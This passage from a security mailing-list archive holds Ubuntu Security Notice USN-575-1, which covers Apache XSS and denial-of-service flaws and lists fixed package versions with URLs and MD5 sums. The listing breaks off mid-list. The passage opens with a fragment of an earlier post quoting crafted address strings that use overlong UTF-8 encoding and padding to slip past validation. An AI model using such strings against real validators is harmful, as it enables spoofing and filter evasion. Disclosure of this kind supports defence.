www.gmail.com%C0%AF%C0%AF%C0%C0%80 at hotmail > > ah heck we don't need that at all: > www.gmail.comxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx at hotmail > > works fine also :) > From jamie at ubuntu.com Tue Feb 5 00:14:49 2008 From: jamie at ubuntu.com (Jamie Strandboge) Date: Mon, 4 Feb 2008 19:14:49 -0500 Subject: [Full-disclosure] [USN-575-1] Apache vulnerabilities Message-ID: <20080205001449.GB6406@lupin.strandboge.com> =========================================================== Ubuntu Security Notice USN-575-1 February 04, 2008 apache2 vulnerabilities CVE-2006-3918, CVE-2007-3847, CVE-2007-4465, CVE-2007-5000, CVE-2007-6388, CVE-2007-6421, CVE-2007-6422, CVE-2008-0005 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: apache2-mpm-perchild 2.0.55-4ubuntu2.3 apache2-mpm-prefork 2.0.55-4ubuntu2.3 apache2-mpm-worker 2.0.55-4ubuntu2.3 Ubuntu 6.10: apache2-mpm-perchild 2.0.55-4ubuntu4.2 apache2-mpm-prefork 2.0.55-4ubuntu4.2 apache2-mpm-worker 2.0.55-4ubuntu4.2 Ubuntu 7.04: apache2-mpm-event 2.2.3-3.2ubuntu2.1 apache2-mpm-perchild 2.2.3-3.2ubuntu2.1 apache2-mpm-prefork 2.2.3-3.2ubuntu2.1 apache2-mpm-worker 2.2.3-3.2ubuntu2.1 Ubuntu 7.10: apache2-mpm-event 2.2.4-3ubuntu0.1 apache2-mpm-perchild 2.2.4-3ubuntu0.1 apache2-mpm-prefork 2.2.4-3ubuntu0.1 apache2-mpm-worker 2.2.4-3ubuntu0.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that Apache did not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which could result in browsers becoming vulnerable to cross-site scripting attacks when processing the output. With cross-site scripting vulnerabilities, if a user were tricked into viewing server output during a crafted server request, a remote attacker could exploit this to modify the contents, or steal confidential data (such as passwords), within the same domain. This was only vulnerable in Ubuntu 6.06. (CVE-2006-3918) It was discovered that when configured as a proxy server and using a threaded MPM, Apache did not properly sanitize its input. A remote attacker could send Apache crafted date headers and cause a denial of service via application crash. By default, mod_proxy is disabled in Ubuntu. (CVE-2007-3847) It was discovered that mod_autoindex did not force a character set, which could result in browsers becoming vulnerable to cross-site scripting attacks when processing the output. (CVE-2007-4465) It was discovered that mod_imap/mod_imagemap did not force a character set, which could result in browsers becoming vulnerable to cross-site scripting attacks when processing the output. By default, mod_imap/mod_imagemap is disabled in Ubuntu. (CVE-2007-5000) It was discovered that mod_status when status pages were available, allowed for cross-site scripting attacks. By default, mod_status is disabled in Ubuntu. (CVE-2007-6388) It was discovered that mod_proxy_balancer did not sanitize its input, which could result in browsers becoming vulnerable to cross-site scripting attacks when processing the output. By default, mod_proxy_balancer is disabled in Ubuntu. This was only vulnerable in Ubuntu 7.04 and 7.10. (CVE-2007-6421) It was discovered that mod_proxy_balancer could be made to dereference a NULL pointer. A remote attacker could send a crafted request and cause a denial of service via application crash. By default, mod_proxy_balancer is disabled in Ubuntu. This was only vulnerable in Ubuntu 7.04 and 7.10. (CVE-2007-6422) It was discovered that mod_proxy_ftp did not force a character set, which could result in browsers becoming vulnerable to cross-site scripting attacks when processing the output. By default, mod_proxy_ftp is disabled in Ubuntu. (CVE-2008-0005) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.3.diff.gz Size/MD5: 121305 10359a467847b63f8d6603081450fece http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.3.dsc Size/MD5: 1148 923d0e3dcb5afba32a130aed96ac7214 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz Size/MD5: 6092031 45e32c9432a8e3cf4227f5af91b03622 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu2.3_all.deb Size/MD5: 2124588 2befe634f0a889cc2241772f2a7d7164 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.3_amd64.deb Size/MD5: 832842 032c077cfeb6ffbc3989c54c27cb729a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.3_amd64.deb Size/MD5: 228206 771457a0b555eef325be270e1c22c0c2 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.3_amd64.deb Size/MD5: 223236 77988570570b779ebf92fcc3dc7dc198 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.3_amd64.deb Size/MD5: 227904 945d30797a27c7ac28a96d9c1793b80d http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.3_amd64.deb Size/MD5: 171402 3b7567107864cf36953e7911a4851738 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.3_amd64.deb Size/MD5: 172186 85a591ea061cbc727fc261b046781502 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.3_amd64.deb Size/MD5: 94240 b80027348754c493312269f7410b38fe http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.3_amd64.deb Size/MD5: 36228 2821ca9410c9cd287e756f05b0f6930c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.3_amd64.deb Size/MD5: 285664 76f4879738a0a788414316581ac2010b http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.3_amd64.deb Size/MD5: 144250 3cd8327429958569a306257da57e8be0 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.3_i386.deb Size/MD5: 786052 7bdddb451607eeb2abb9706641675397 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.3_i386.deb Size/MD5: 202862 a88456a5949fe1da4ad3f6c969d3a886 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.3_i386.deb Size/MD5: 198746 aa72459cae4f5765ccd1b58d275961bc http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.3_i386.deb Size/MD5: 202338 13bbe75f89aeedb6dec9be929528df48 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.3_i386.deb Size/MD5: 171408 34209e19f6ef01cb08aa75c1b3045495 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.3_i386.deb Size/MD5: 172176 4521336ea6f4d87391ee96d70b79f887 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.3_i386.deb Size/MD5: 92182 d8a3310073c017cdc7d3ffd1046a50cf http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.3_i386.deb Size/MD5: 36220 0ae71bd4efdd0fb325864f46ba4f16e7 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.3_i386.deb Size/MD5: 261736 476e8d909e279fac698baf9cf0d62300 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.3_i386.deb Size/MD5: 132160 3efb3c11dd844fbc429eff5818dcdae2 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.3_powerpc.deb Size/MD5: 859014 a8c42d748bfd616f6a6f1bbbf2224205 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.3_powerpc.deb Size/MD5: 220254 84f7c2678fbab6b303361d32f1a741a8 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.3_powerpc.deb Size/MD5: 215932 bee4a6e00371117203647fd3a311658a http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.3_powerpc.deb Size/MD5: 219800 aaf4968deba24912e4981f35a367a086 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.3_powerpc.deb Size/MD5: 171410 a15c13c0a2ec49e805f9ae83e5db4ae7 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.3_powerpc.deb Size/MD5: 172198 4e411b4b16daab9a0ddc9ea3651f448d http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.3_powerpc.deb Size/MD5: 103940 dca02b7f5bc6848fa1dc8aa530f04910 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.3_powerpc.deb Size/MD5: 36222 619ee3ea1064d11a02de092690bfb1e1 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.3_powerpc.deb Size/MD5: 281280 9325dbc26f57d76254ceca78bee4cff2 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.3_powerpc.deb Size/MD5: 141398 668d7fb9dd196e82601ca6d43a326813 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.3_sparc.deb Size/MD5: 803242 120feec10c0dcc370894e2a3bdcd399b http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.3_sparc.deb Size/MD5: 210668 062841f2fd30c07ff1f5b101a7c1e196 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.3_sparc.deb Size/MD5: 206266 35b3b9d4b34844b01576ca7963b5edda http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.3_sparc.deb Size/MD5: 209954 4f99e4d02fc93222cb541edb09358b79 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.3_sparc.deb Size/MD5: 171404 bd728a86c1a8984d60caeee35da0c451 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.3_sparc.deb Size/MD5: 172184 1794886b8aca59cf28cbe28d853f42ae http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.3_sparc.deb Size/MD5: 93282 1ae6def788c74750d79055784c0d8006 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.3_sparc.deb Size/MD5: 36230 5f1d8e4d19324674a1f5748601431758 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.3_sparc.deb Size/MD5: 267832 96c149638daeb993250b18c9f4285abf http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.3_sparc.deb Size/MD5: 130082 7a62f71e679a233ca118cb9813ffd3e3 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.2.diff.gz Size/MD5: 121671 775c3b2d53630ddfb4386cbfdb954861 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.2.dsc Size/MD5: 1148 a5dd357e0bef2dc308656c6c0af5ca1c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz Size/MD5: 6092031 45e32c9432a8e3cf4227f5af91b03622 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu4.2_all.deb Size/MD5: 2124902 baf4147b4e4d939a08f20c8ac987abf7 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.2_amd64.deb Size/MD5: 836086 e04fced4fc1efd4a192a4016f679bc38 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.2_amd64.deb Size/MD5: 227790 27c558402837f9d4c85315dcdde2f4e1 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.2_amd64.deb Size/MD5: 222698 a33ef1566dcd4793b0aa633435e8ee44 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.2_amd64.deb Size/MD5: 227296 4b3c5e771574d858dd655a9e0a7a5d8c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.2_amd64.deb Size/MD5: 171640 bd8fbcd40f5431e6688156ba4b17e960 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.2_amd64.deb Size/MD5: 172412 0520836bca78eb64bc97d4a8cc481487 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.2_amd64.deb Size/MD5: 94518 8b35759996e50046eca8154ebc63fc1f http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.2_amd64.deb Size/MD5: 36530 1b08b4418ff0f7ba90940433116cf6d8 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.2_amd64.deb Size/MD5: 286876 1426b92819b56ff892483acedfdea4c6 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.2_amd64.deb Size/MD5: 145340 109c93408c5197be50960cce80c23b7c i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.2_i386.deb Size/MD5: 806640 81e91910683454a4b2444e0ce8e929bc http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.2_i386.deb Size/MD5: 209996 27440ecbe836673f63ae1773e238eb65 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.2_i386.deb Size/MD5: 206098 e77a4b69c1c456f4ca6c03d9105d8552 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.2_i386.deb Size/MD5: 209552 8a23207211e54b138d5a87c15c097908 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.2_i386.deb Size/MD5: 171636 07616e459905bad152a8669c8f670436 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.2_i386.deb Size/MD5: 172408 69300678b2f8b908f90a91de325c7ee2 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.2_i386.deb Size/MD5: 93558 d47cdad1593a7332507c7d0388effbf4 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.2_i386.deb Size/MD5: 36532 47800e58ec26a1389005b8120ad3ca3e http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.2_i386.deb Size/MD5: 266728 65cd78808f959d9e73a4d5e348bf3e20 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.2_i386.deb Size/MD5: 137934 1493ea26165b34a841da777ed801ca7a powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.2_powerpc.deb Size/MD5: 865216 a635390e5772dd30dac70f7aba5e620d http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.2_powerpc.deb Size/MD5: 222022 e37ef7d710800e568d838242d3129725 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.2_powerpc.deb Size/MD5: 217630 53127602a5df28a5d66fdd11e396c346 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.2_powerpc.deb Size/MD5: 221782 d3e43cef5b90a7e3aa405a5d167ddfb6 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.2_powerpc.deb Size/MD5: 171632 d9f1c242ffeab1b90850a6ffc78f0148 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.2_powerpc.deb Size/MD5: 172404 51b40f3e6a486ce372844ad24b83ecf5 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.2_powerpc.deb Size/MD5: 104970 0f281f65023f52f0bea2dc54136b6c57 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.2_powerpc.deb Size/MD5: 36530 c8c4a7e645fe938da23737602589d08c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.2_powerpc.deb Size/MD5: 284866 ba3e1b09a14d8e5485561118f6eeefb7 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.2_powerpc.deb Size/MD5: 144554 66d17552fd2385cfdf44c5d55ea583c9 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu4.2_sparc.deb Size/MD5: 811380 c2578ed2a96363e7c5fb268933487ccb http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu4.2_sparc.deb Size/MD5: 212602 aab797ade503fec11a36dbf640e1ef08 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu4.2_sparc.deb Size/MD5: 208354 0a571678c269d1da06787dac56567f1c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu4.2_sparc.deb Size/MD5: 212052 90754ccdcd95e652413426376078d223 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu4.2_sparc.deb Size/MD5: 171634 00fbac613f13f1d1e20470ce42703018 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu4.2_sparc.deb Size/MD5: 172414 65e31d4a009a9663212f8cfcfa492c53 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu4.2_sparc.deb Size/MD5: 94100 95bd6b71a6bc1fceeccbc51d2b913bd2 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.2_sparc.deb Size/MD5: 36532 b4a7ccf0ba37c70b78a950bacbc4a650 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu4.2_sparc.deb Size/MD5: 268776 5b157a4dd55f533a610bc6c111e9d414 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu4.2_sparc.deb Size/MD5: 131000 dda2d34f2e90e0468b02e261ae2c6afe Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3-3.2ubuntu2.1.diff.gz Size/MD5: 115896 cbb8201fa61844fe02dcc7c2e1e35cf5 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3-3.2ubuntu2.1.dsc Size/MD5: 1128 77143d282e5fc16d3f1dc327b7a4fd87 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3.orig.tar.gz Size/MD5: 6342475 f72ffb176e2dc7b322be16508c09f63c Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.2.3-3.2ubuntu2.1_all.deb Size/MD5: 2199570 be1a62334680ed00d5f5a4c74113d524 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.2.3-3.2ubuntu2.1_all.deb Size/MD5: 272460 eb0d9dce34ef9dd4b940fb98c38e529c http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-src_2.2.3-3.2ubuntu2.1_all.deb Size/MD5: 6672646 b3d11c9f4451f75e4ff17e663999a579 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.3-3.2ubuntu2.1_all.deb Size/MD5: 39090 d2db3ef69d13b4ed76493e189174c304 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu2.1_amd64.deb Size/MD5: 450016 f2726571f028c6f228a73faa1b620f63 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu2.1_amd64.deb Size/MD5: 445732 2f791f5e207e2ed047c4ed36572cea6d http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu2.1_amd64.deb Size/MD5: 449602 a67b291ea2270e9c46f8eaecef65f7c6 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu2.1_amd64.deb Size/MD5: 403950 bc7a8419daa6c451decbb5640241df32 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu2.1_amd64.deb Size/MD5: 404518 099bb7f53ae885bd7e8157c781c5b50b http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu2.1_amd64.deb Size/MD5: 341726 0aed173b3eb2db83ddd6ddb49bab7c4e http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu2.1_amd64.deb Size/MD5: 971426 30db1106dfea5106da54d2287c02a380 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu2.1_i386.deb Size/MD5: 433320 03d3aa003bf777f1f1ae9d8f814caac1 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu2.1_i386.deb Size/MD5: 429248 e49f5accb8764204a2a759ea8b2dea55 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu2.1_i386.deb Size/MD5: 432706 a3c32680004d3e0b460513d426006bb0 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu2.1_i386.deb Size/MD5: 403964 63c77d5009e715094d21c273b57c04d0 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu2.1_i386.deb Size/MD5: 404530 f4b9eb26fa058eaec8f75ae956cbc852 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu2.1_i386.deb Size/MD5: 340810 e5d63edb8c0f2baccf9a2b072d1c3d74 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu2.1_i386.deb Size/MD5: 929546 828b8224e2540d7bc4e462d5b2b1f8af powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu2.1_powerpc.deb Size/MD5: 451914 b1057076382cb22727fa0bcd202c57dd http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu2.1_powerpc.deb Size/MD5: 447340 44e26684bd3a09f2ed6969d2c540f5ae http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu2.1_powerpc.deb Size/MD5: 451324 2c029a48b2242e1fdf137a6cec3af09d http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu2.1_powerpc.deb Size/MD5: 403974 65a11cfaee921517445cf74ed04df701 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu2.1_powerpc.deb Size/MD5: 404538 d27226fdeac7d193651a2cb2bd4b61e8 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu2.1_powerpc.deb Size/MD5: 360936 058bbb5e05afc0ca08805ca71a713a42 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu2.1_powerpc.deb Size/MD5: 1073822 0f9dda867e9131cc5418dd40ec579d38 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.3-3.2ubuntu2.1_sparc.deb Size/MD5: 434804 ff6361811108a9be8b45dd255b84c376 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.3-3.2ubuntu2.1_sparc.deb Size/MD5: 430968 367e708f82317b657439fc9e70dfb3eb http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.3-3.2ubuntu2.1_sparc.deb Size/MD5: 434308 2073137bb138dc52bbace666714f4e14 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.3-3.2ubuntu2.1_sparc.deb Size/MD5: 403952 f0ed9c92b917d1749825e64be61d8822 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.3-3.2ubuntu2.1_sparc.deb Size/MD5: 404520 fa7ce800de2eb5719c479a7506798b88 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.3-3.2ubuntu2.1_sparc.deb Size/MD5: 343774 880faca3543426734431c29de77c3048 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.3-3.2ubuntu2.1_sparc.deb Size/MD5: 938534 3e9075d30b9cedd73a936a14b8b84374 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.4-3ubuntu0.1.diff.gz Size/MD5: 121669 dd7399c1dacd25d2153af25d3e9c3ea5 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.4-3ubuntu0.1.dsc Size/MD5: 1241 9b9bd27a1cfe3fc33d63b0b13d345e98 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.4.orig.tar.gz Size/MD5: 6365535 3add41e0b924d4bb53c2dee55a38c09e Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.2.4-3ubuntu0.1_all.deb Size/MD5: 2211118 6da81663b251e862bb665d9627271b9f http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.2.4-3ubuntu0.1_all.deb Size/MD5: 278032 4f8270cff0a532bd059741b366047da9 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-src_2.2.4-3ubuntu0.1_all.deb Size/MD5: 6700348 b133a1244f39b3f64fdd47cdd4a64480 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.2.4-3ubuntu0.1_all.deb Size/MD5: 42192 3f0351337b9c5d21ceea4b92a3911040 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.4-3ubuntu0.1_amd64.deb Size/MD5: 456628 d85a3cbc0eef82e845a8327180136469 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.2.4-3ubuntu0.1_amd64.deb Size/MD5: 452408 8dd9341af4b538e6c9f8f70faf5fd2f2 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.2.4-3ubuntu0.1_amd64.deb Size/MD5: 456134 f6bcb10663b0c13cdf68c6d0e83c6342 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.2.4-3ubuntu0.1_amd64.deb Size/MD5: 410020 036c44117688999e0eaa7a6cfc1b5a11 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.2.4-3ubuntu0.1_amd64.deb Size/MD5: 410604 cbb1e906a74fb2a34f41a3243ffa8010 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.2.4-3ubuntu0.1_amd64.deb Size/MD5: 347444 63413a914cb4546704032ab8f7f16a80 http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2.2-common_2.2.4-3ubuntu0.1_amd64.deb Size/MD5: 989366 b0c2d84f421fcb331efcec2a7b0711d1 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-event_2.2.4-3ubuntu0.1_i386.deb Size/MD5: 439730 46888aaf742cdcc30bcf7983d31c0158 